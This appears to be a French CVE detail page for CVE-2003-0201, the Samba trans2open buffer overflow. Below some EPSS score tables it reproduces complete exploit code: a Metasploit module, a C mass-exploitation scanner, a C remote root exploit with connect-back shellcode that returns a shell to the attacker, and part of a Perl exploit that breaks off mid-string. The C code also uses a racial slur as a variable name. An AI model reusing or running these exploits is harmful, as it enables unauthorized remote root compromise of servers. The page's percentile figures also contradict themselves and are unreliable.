CVE-2003-0201 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	90.16%	–	–
2023-03-12	–	–	–	96.89%	–
2023-04-23	–	–	–	96.89%	–
2023-09-24	–	–	–	97.07%	–
2024-02-11	–	–	–	97.04%	–
2024-06-02	–	–	–	97.04%	–
2024-08-25	–	–	–	97.05%	–
2024-12-22	–	–	–	96.64%	–
2025-01-19	–	–	–	96.64%	–
2025-03-18	–	–	–	–	82.85%
2025-04-15	–	–	–	–	84.74%
2025-04-22	–	–	–	–	82.85%
2025-04-22	–	–	–	–	82.85,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-04-23	1%
2023-09-24	1%
2024-02-11	1%
2024-06-02	1%
2024-08-25	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-04-15	99%
2025-04-22	99%
2025-04-22	99%

## # $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba trans2open Overflow (*BSD x86)', 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9552 $', 'References' => [ [ 'CVE', '2003-0201' ], [ 'OSVDB', '4469' ], [ 'BID', '7294' ], [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'MinNops' => 512, 'StackAdjustment' => -3500 }, 'Platform' => 'bsd', 'Targets' => [ # tested OK - jjd: # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8 [ 'Samba 2.2.x - Bruteforce', { 'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack 'Offset' => 1055, 'Bruteforce' => { 'Start' => { 'Ret' => 0xbfbffdfc }, 'Stop' => { 'Ret' => 0xbfa00000 }, 'Step' => 256 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2003' )) register_options( [ Opt::RPORT(139) ], self.class) end def brute_exploit(addrs) curr_ret = addrs['Ret'] begin print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login # This value *must* be 1988 to allow findrecv shellcode to work # XXX: I'm not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional # information. # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) eip_off = target['Offset'] ptr_to_non_zero = target['PtrToNonZero'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded # We want test true here, so we overwrite conn with a pointer # to something non-zero. # # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') # We want to avoid crashing on the following two derefences. # # 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line) # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') # This stream covers the framepointer and the return address #pattern[1199, 400] = [curr_ret].pack('N') * 100 pattern[eip_off, 4] = [curr_ret].pack('V') trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern # puts "press any key"; $stdin.gets sock.put(trans) handler disconnect rescue EOFError rescue => e print_error("#{e}") end end end

/* * Mass Samba Exploit by Schizoprenic * Xnuxer-Research (c) 2003 * This code just for eduction purpose */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> void usage(char *s) { printf("Usage: %s \n",s); exit(-1); } int main(int argc, char **argv) { printf("Mass Samba Exploit by Schizoprenic\n"); if(argc != 3) usage(argv[0]); scan(argv[1], argv[2]); return 0; } int scan(char *fl, char *bind_ip) { FILE *nigger,*fstat; char buf[512]; char cmd[100]; int i; struct stat st; if((nigger=fopen(fl,"r")) == NULL) { fprintf(stderr,"File %s not found!\n", fl); return -1; } while(fgets(buf,512,nigger) != NULL) { if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0; for (i=0;i<4;i++) { sprintf(cmd, "./smb %d %s %s", i, buf, bind_ip); printf("\nTrying get root %s use type %d ...\n",buf,i); system(cmd); if (stat(".ROOT", &st) != -1) { unlink(".ROOT"); break; } } } fclose(nigger); printf("\nMass exploiting finished.\n"); } /* * Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003. * Using connect back method and brute force mode. * I just create & modify some code and ripped too :P * Create on May, 12st 2003 * * Thanks to eDSee (netric.org), Sambal is nice exploit bro... * References: trans2root.pl, 0x333hate.c, sambal.c * This code just for eduction purpose * * XNUXER RESEARCH LABORATORY * Official Site: http://infosekuriti.com * Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char linux_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; char bsd_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; typedef struct { unsigned char type; unsigned char flags; unsigned short length; } NETBIOS_HEADER; typedef struct { unsigned char protocol[4]; unsigned char command; unsigned short status; unsigned char reserved; unsigned char flags; unsigned short flags2; unsigned char pad[12]; unsigned short tid; unsigned short pid; unsigned short uid; unsigned short mid; } SMB_HEADER; pid_t childs[50]; int LOOP = 1; struct sockaddr_in serv_addr; int sock_listen, client; int exploit_pid; int listen_pid; int port_listen = 45295; void usage(char *prog) { int i; fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n" "Connect back method, Xnuxer-Labs, 2003.\n" "Usage : %s \n" "Targets:\n" " 0 = Linux\n" " 1 = FreeBSD/NetBSD\n" " 2 = OpenBSD 3.0 and prior\n" " 3 = OpenBSD 3.2 - non-exec stack\n\n", prog); exit(1); } int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set connect_read, connect_write; struct timeval timeout; int getsockopt_length = 0; int getsockopt_error = 0; struct sockaddr_in server; bzero(&server, sizeof(server)); server.sin_family = AF_INET; inet_pton(AF_INET, ip, &server.sin_addr); server.sin_port = htons(port); if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return -1; } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return -1; } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&connect_read); FD_ZERO(&connect_write); FD_SET(fd, &connect_read); FD_SET(fd, &connect_write); if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { if(errno != EINPROGRESS) { close(fd); return -1; } } else { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { getsockopt_length = sizeof(getsockopt_error); if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; } if(getsockopt_error == 0) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { errno = getsockopt_error; close(fd); return (-1); } } } else { close(fd); return 1; } if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdread; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdread); FD_SET(fd, &fdread); select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); if(select_status == 0) { close(fd); return (-1); } if(select_status == -1) { close(fd); return (-1); } if(FD_ISSET(fd, &fdread)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return 1; } } int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdwrite; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdwrite); FD_SET(fd, &fdwrite); select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &fdwrite)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return -1; } } int start_session(int sock) { char buffer[1000]; char response[4096]; char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x2E); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x73; /* session setup */ smbheader->flags = 0x08; /* caseless pathnames */ smbheader->flags2 = 0x01; /* long filenames supported */ smbheader->pid = getpid() & 0xFFFF; smbheader->uid = 100; smbheader->mid = 0x01; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); //if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); memset(buffer, 0x00, sizeof(buffer)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x3C); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x70; /* start connection */ smbheader->pid = getpid() & 0xFFFF; smbheader->tid = 0x00; smbheader->uid = 100; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) return -1; return 0; } int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x90; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer + 1099 + i, &dummy, 4); memcpy(buffer + 1103 + i, &ret, 4); } memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1800, shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x30; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1127, &ret, 4); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="uname -a;id;\n"; int n; send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; if( FD_ISSET(sock, &fd_read) ) { n=read(sock,buff,sizeof(buff)); if (n == 0) { printf ("Connection closed.\n"); exit(EXIT_FAILURE); } else if (n < 0) { perror("read remote"); exit(EXIT_FAILURE); } write(1,buff,n); } if ( FD_ISSET(0, &fd_read) ) { if((n=read(0,buff,sizeof(buff)))<=0){ perror ("read user"); exit(EXIT_FAILURE); } write(sock,buff,n); } } close(sock); } void GoAway() { exit(0); } void start_listen() { FILE *fstat; int cpid; LISTENER: bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=htons(port_listen); sock_listen=socket(2,1,6); if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) { port_listen++; goto LISTENER; } if(listen(sock_listen,1)) { perror("listen"); exit(1); } fprintf(stdout, "[+] Listen on port: %d\n",port_listen); cpid = fork(); if (cpid) { client=accept(sock_listen,0,0); LOOP = 0; kill(SIGUSR2, exploit_pid); if (client > 0) { fprintf(stdout, "[+] Yeah, I have a root ....!\n" "------------------------------\n"); fstat=fopen(".ROOT", "a"); //needed by mass.c fclose(fstat); shell(client); } exit(0); } } int main (int argc,char *argv[]) { char *shellcode = NULL; int typeos = -1; int port = 139; int sock = 0; int i = 0; int status = 0; int m = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; int sta = 0; int STEPS = 512; int ENDLOOP = 64; char *desc; unsigned long MAX_CHILDS = 40; unsigned long ret = 0x0; unsigned short int a_port; struct sockaddr_in addr1; struct hostent *he; struct stat st; if (argc != 4) usage(argv[0]); typeos = atoi(argv[1]); if (typeos > 3) { fprintf(stdout, "Os type out of list!\n"); exit(1); } he = gethostbyname(argv[2]); if (he == NULL) { fprintf(stderr, "Unable to resolve\n"); return -1; } listen_pid = getpid(); start_listen(); exploit_pid = listen_pid + 1; //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid); sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1; linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2; linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3; linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4; fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", ip1, ip2, ip3, ip4, port_listen); a_port = htons(port_listen); linux_connect_back[177]= (a_port) & 0xff; linux_connect_back[178]= (a_port >> 8) & 0xff; bsd_connect_back[168]= (a_port) & 0xff; bsd_connect_back[169]= (a_port >> 8) & 0xff; switch(typeos) { case 0: desc = "Linux"; ret = 0xc0000000; shellcode = linux_connect_back; break; case 1: desc = "FreeBSD/NetBSD"; ret = 0xbfc00000; shellcode = bsd_connect_back; break; case 2: desc = "OpenBSD 3.1 and prior"; ret = 0xdfc00000; shellcode = bsd_connect_back; break; case 3: desc = "OpenBSD 3.2 non-exec stack"; ret = 0x00170000; shellcode = bsd_connect_back; break; } fprintf(stdout, "[+] Target: %s\n", desc); memcpy(&addr1.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); fprintf(stdout, "[+] Please wait in seconds...!\n"); signal(SIGUSR2, GoAway); for (i = 0; i < 50; i++) childs[i] = -1; i = 0; m = 0; while (LOOP) { if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "[+] socket() error.\n"); exit(-1); } ret -= STEPS; i++; if ((ret & 0xff) == 0x00 && typeos != 3) ret++; m++; //fflush(0); //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m); usleep(150000); switch (childs[i] = fork()) { case 0: if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == - 1) { //fprintf(stderr, "[+] connect() error.\n"); close(sock); exit(-1); } start_session(sock); sleep(3); if (typeos != 3) { if (exploit_normal(sock, ret, shellcode) < 0) { //fprintf(stderr, " -> Failed.\n"); close(sock); exit(-1); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { //fprintf(stderr, " -> Failed.\n"); close(sock); exit(-1); } } sleep(5); close(sock); exit(0); break; case -1: exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } if (m == ENDLOOP) LOOP = 0; } if (stat(".ROOT", &st) != -1) kill(SIGUSR2, listen_pid); else { fprintf(stdout, "[+] Dohh, exploit failed.\n"); close(client); close(sock_listen); kill(listen_pid, SIGUSR2); sleep(2); exit(0); } } // milw0rm.com [2003-07-13]

#!/usr/bin/perl ############### ##[ Header # Name: trans2root.pl # Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow) # Author: H D Moore <hdmoore@digitaldefense.net> # Copyright: Copyright (C) 2003 Digital Defense Inc. # trans2root.pl <options> -t <target type> -H <your ip> -h <target ip> ## use strict; use Socket; use IO::Socket; use IO::Select; use POSIX; use Getopt::Std; $SIG{USR2} = \&GoAway; my %args; my %targets = ( "linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86], "solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86], "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86], # name # default # start # end # step # function ); getopt('t:M:h:p:r:H:P:', \%args); my $target_type = $args{t} || Usage(); my $target_host = $args{h} || Usage(); my $local_host = $args{H} || Usage(); my $local_port = $args{P} || 1981; my $target_port = $args{p} || 139; my $target_mode = "brute"; if (! exists($targets{$target_type})) { Usage(); } print "[*] Using target type: $target_type\n"; # allow single mode via the -M option if ($args{M} && uc($args{M}) eq "S") { $target_mode = "single"; } # the parent process listens for an incoming connection # the child process handles the actual exploitation my $listen_pid = $$; my $exploit_pid = StartListener($local_port); # get the default return address for single mode my $targ_ret = $args{r} || $targets{$target_type}->[0]; my $curr_ret; $targ_ret = eval($targ_ret); if ($target_mode !~ /brute|single/) { print "[*] Invalid attack mode: $target_mode (single or brute only)\n"; exit(0); } if ($target_mode eq "single") { $curr_ret = $targ_ret; if(! $targ_ret) { print "[*] Invalid return address specified!\n"; kill("USR2", $listen_pid); exit(0); } print "[*] Starting single shot mode...\n"; printf ("[*] Using return address of 0x%.8x\n", $targ_ret); my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret); my $ret = AttemptExploit($target_host, $target_port, $buf); sleep(2); kill("USR2", $listen_pid); exit(0); } if ($target_mode eq "brute") { print "[*] Starting brute force mode...\n"; for ( $curr_ret =$targets{$target_type}->[1]; $curr_ret >= $targets{$target_type}->[2]; $curr_ret -=$targets{$target_type}->[3] ) { select(STDOUT); $|++; my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret); printf (" \r[*] Return Address: 0x%.8x", $curr_ret); my $ret = AttemptExploit($target_host, $target_port, $buf); } sleep(2); kill("USR2", $listen_pid); exit(0); } sub Usage { print STDERR "\n"; print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n"; print STDERR "===================================\n\n"; print STDERR " Usage: \n"; print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>\n"; print STDERR " Options: \n"; print STDERR " -M (S|B) <single or brute mode>\n"; print STDERR " -r <return address for single mode>\n"; print STDERR " -p <alternate Samba port>\n"; print STDERR " -P <alternate listener port>\n"; print STDERR " Targets:\n"; foreach my $type (keys(%targets)) { print STDERR " $type\n"; } print STDERR "\n"; exit(1); } sub StartListener { my ($local_port) = @_; my $listen_pid = $$; my $s = IO::Socket::INET->new ( Proto => "tcp", LocalPort => $local_port, Type => SOCK_STREAM, Listen => 3, ReuseAddr => 1 ); if (! $s) { print "[*] Could not start listener: $!\n"; exit(0); } print "[*] Listener started on port $local_port\n"; my $exploit_pid = fork(); if ($exploit_pid) { my $victim; $SIG{USR2} = \&GoAway; while ($victim = $s->accept()) { kill("USR2", $exploit_pid); print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n"; StartShell($victim); } exit(0); } return ($exploit_pid); } sub StartShell { my ($client) = @_; my $sel = IO::Select->new(); Unblock(*STDIN); Unblock(*STDOUT); Unblock($client); select($client); $|++; select(STDIN); $|++; select(STDOUT); $|++; $sel->add($client); $sel->add(*STDIN); print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n"; print $client "echo \n"; while (fileno($client)) { my $fd; my @fds = $sel->can_read(0.2); foreach $fd (@fds) { my @in = <$fd>; if(! scalar(@in)) { next; } if (! $fd || ! $client) { print "[*] Closing connection.\n"; close($client); exit(0); } if ($fd eq $client) { print STDOUT join("", @in); } else { print $client join("", @in); } } } close ($client); } sub AttemptExploit { my ($Host, $Port, $Exploit) = @_; my $res; my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp"); if (! $s) { print "\n[*] Error: could not connect: $!\n"; kill("USR2", $listen_pid); exit(0); } select($s); $|++; select(STDOUT); $|++; Unblock($s); my $SetupSession = "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08". 